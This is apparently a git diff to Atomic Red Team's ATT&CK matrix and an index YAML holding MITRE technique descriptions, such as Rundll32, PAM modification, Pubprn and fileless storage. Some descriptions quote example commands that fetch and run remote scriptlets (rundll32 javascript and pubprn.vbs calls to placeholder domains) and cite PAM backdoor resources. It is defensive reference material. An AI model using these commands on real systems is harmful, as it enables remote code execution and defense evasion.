+|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Debugger Evasion](../../T1622/T1622.md) |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
+|  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Masquerading](../../T1036/T1036.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
+|  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
+|  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) |  |  |  |  |  |  |
+|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  |  |  |  |  |  |
+|  |  | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Event Triggered Execution](../../T1546/T1546.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) |  |  |  |  |  |  |  |
 |  |  | [Account Manipulation](../../T1098/T1098.md) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | [Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) |  |  |  |  |  |  |  |
 |  |  | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -107,6 +108,7 @@
 |  |  |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Run Virtual Instance](../../T1564.006/T1564.006.md) |  |  |  |  |  |  |  |
+|  |  |  |  | Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md) |  |  |  |  |  |  |  |
@@ -123,7 +125,10 @@
 |  |  |  |  | [Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) |  |  |  |  |  |  |  |
+|  |  |  |  | ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [HTML Smuggling](../../T1027.006/T1027.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/azure-ad-index.yaml b/atomics/Indexes/azure-ad-index.yaml
index 601423ff20..5a9259f93b 100644
--- a/atomics/Indexes/azure-ad-index.yaml
+++ b/atomics/Indexes/azure-ad-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
